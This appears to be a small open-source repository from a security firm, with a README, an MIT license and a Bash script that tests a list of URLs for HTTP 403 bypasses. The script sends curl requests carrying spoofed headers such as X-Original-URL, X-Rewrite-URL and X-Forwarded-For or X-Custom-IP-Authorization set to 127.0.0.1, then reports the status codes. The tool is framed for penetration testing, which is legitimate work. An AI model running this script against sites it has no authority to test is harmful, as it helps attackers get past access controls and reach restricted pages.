├── README.md ├── LICENSE └── 403_bypass.sh /README.md: -------------------------------------------------------------------------------- 1 | # Bulk 403 Bypass 2 | 3 | This is a Bash script that performs bulk 403 bypass by adding a custom header to HTTP requests. It can be useful for testing whether a website is vulnerable to 403 bypass techniques. 4 | 5 | ## Usage 6 | 7 | To use the script, pass in a list of URLs as a command line argument: 8 | 9 | ```bash 10 | ./403_bypass.sh urls.txt 11 | ``` 12 | 13 | ## License 14 | 15 | This project is licensed under the MIT License - see the [LICENSE](LICENSE) 16 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Aardwolf Security Ltd 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /403_bypass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | figlet Bulk 403 Bypass 4 | echo " By Aardwolf Security" 5 | 6 | # Check if input file is provided 7 | if [ $# -eq 0 ] 8 | then 9 | echo "Usage: $0 input_file" 10 | exit 1 11 | fi 12 | 13 | # Loop through the URLs in the input file 14 | while read url 15 | do 16 | # Test for known 403 bypasses 17 | echo "Testing: $url" 18 | curl -s -o /dev/null -w "X-Custom-IP-Authorization: 127.0.0.1 - %{http_code}\n" -H "X-Custom-IP-Authorization: 127.0.0.1" --max-time 5 $url 19 | curl -s -o /dev/null -w "X-Original-URL: $url - %{http_code}\n" -H "X-Original-URL: $url" --max-time 5 $url 20 | curl -s -o /dev/null -w "X-Rewrite-URL: $url - %{http_code}\n" -H "X-Rewrite-URL: $url" --max-time 5 $url 21 | curl -s -o /dev/null -w "Referer: $url - %{http_code}\n" -H "Referer: $url" --max-time 5 $url 22 | curl -s -o /dev/null -w "X-Originating-IP: 127.0.0.1 - %{http_code}\n" -H "X-Originating-IP: 127.0.0.1" --max-time 5 $url 23 | curl -s -o /dev/null -w "X-Forwarded-For: 127.0.0.1 - %{http_code}\n" -H "X-Forwarded-For: 127.0.0.1" --max-time 5 $url 24 | curl -s -o /dev/null -w "X-Forwarded-Host: $url - %{http_code}\n" -H "X-Forwarded-Host: $url" --max-time 5 $url 25 | curl -s -o /dev/null -w "X-Forwarded-Server: $url - %{http_code}\n" -H "X-Forwarded-Server: $url" --max-time 5 $url 26 | curl -s -o /dev/null -w "X-Host: $url - %{http_code}\n" -H "X-Host: $url" --max-time 5 $url 27 | curl -s -o /dev/null -w "X-HTTP-Host-Override: $url - %{http_code}\n" -H "X-HTTP-Host-Override: $url" --max-time 5 $url 28 | curl -s -o /dev/null -w "X-Original-URL: /$((RANDOM%100000)) - %{http_code}\n" -H "X-Original-URL: /$((RANDOM%100000))" --max-time 5 $url 29 | echo "----------------------" 30 | 31 | done < $1 32 | --------------------------------------------------------------------------------